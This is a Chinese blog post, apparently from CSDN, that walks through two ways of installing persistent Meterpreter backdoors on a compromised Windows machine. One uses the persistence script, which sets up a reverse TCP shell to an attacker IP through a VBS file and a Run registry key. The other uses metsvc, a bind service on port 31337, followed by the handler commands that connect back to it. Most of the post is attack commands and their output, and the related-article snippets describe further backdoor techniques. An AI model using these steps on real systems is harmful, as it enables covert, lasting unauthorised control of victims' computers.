Meterpreter 建立持久后门 backdoor

最新推荐文章于 2024-03-07 19:12:21 发布
最新推荐文章于 2024-03-07 19:12:21 发布
阅读量9.8k 收藏 23
点赞数 4
分类专栏: kali msf 渗透
kali 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
msf
3 篇文章 0 订阅
订阅专栏
渗透
3 篇文章 0 订阅
订阅专栏

安装后门方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108


Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

^9 b5 q" j
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件上面的vbs的确存在


  注释,反弹时间间隔是5s  端口是443 Metasploit服务器Ip是192.168.0.108,缺点是容易被杀毒软件查杀|9 y$ t
3 X' c  d)W  l$ s
安装后门方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...

>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后门如何利用啊?
   msf > use exploit/multi/handler
   msf  exploit(handler) > set payload windows/metsvc_bind_tcp
   msf  exploit(handler) > set LPORT 31337
   msf  exploit(handler) > set RHOST 192.168.200.140

msf  exploit(handler)> exploit

盗才生
关注
专栏目录
Meterpreter 控制持久
Epsilon
03-01 6186
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
metasploitable2渗透:Metasploit攻击VSFTPD2.3.4后门漏洞
qq_43054896的博客
03-25 2444
攻击机 kali:192.168.88.147 靶机 metasploitable2:192.168.88.135 一、主机探测,信息收集 1、利用masscan进行主机端口扫描 使用masscan主要是为了进行快速扫描,查看目标主机metasploitable是否在线,开放端口有哪些 masscan -p 0-65535 --rate 100000 192.168.88.135 根据开放...
Meterpreter Backdoor
AI.PLAY
06-19 742
Install Backdoormeterpreter >run metsvc Creating ameterpreter service on port 31337 Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm... >>Uploading metsrv.dll.
通过meterpreter留nc后门
Yale的博客
01-27 1979
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6180
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
6.1 meterpreter创建后门
robacco的博客
07-31 649
1、使用msfvenom捆绑putty.exe程序,生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能,当运行后门程序的同时,将运行攻击载荷。 msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...
权限维持:常用后门
f_carey的博客
12-18 1546
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
20194311姜晨昊Exp2-后门原理与实践
weixin_51927594的博客
03-28 1355
20194311姜晨昊Exp2-后门原理与实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
Metasploit(后渗透攻击:操作系统后门
qq_41453632的博客
12-10 3677
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 1955
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2518
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,MeterpreterMetasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。MeterpreterMetasploit 框架的一个扩展模块,可以调用 Metasploit 的
后门构建工具Backdoor Factory
weixin_33896069的博客
05-17 327
2019独角兽企业重金招聘Python工程师标准>>> ...
内网渗透之Windows持久后门总结
最新发布
MachineGunJoe666
03-07 1028
LOLBAS,全称Living Off The Land Binaries and Scripts (and also Libraries),是一种白利用方式,是在2013年DerbyCon由Christopher Campbell和Matt Graeber发现,最终Philip Goh提出的概念。这些程序一般有有Microsoft或第三方认证机构的签名,但是除了可以完成正常的功能,也能够被用于内网渗透中。这些程序可能会被用于:下载安全恶意程序、执行恶意代码、绕过UAC、绕过程序控制等。
12.3、后渗透测试--持久后门
无痕的博客
12-13 2407
metasploit后渗透测试--持久后门
20202411 2022-2023-2 《网络与系统攻防技术》实验二实验报告
01学得好,从入门到吃饱
03-23 390
ARM架构大冤种认清了x86的世界,垂死挣扎一天半完成实验,发现原来是自己想太多找罪受
史上最强内网渗透知识点总结
zhalang8324的博客
01-13 7387
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...
CC2538 Bootloader后门中文详解与配置
CC2538 Bootloader Backdoor中文版是一份详细的指南,针对Texas Instruments (TI)的CC2538微控制器的Bootloader后门功能进行详细介绍。CC2538是一款嵌入式无线通信芯片,其内部集成有片上ROM,该ROM包含了引导加载...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值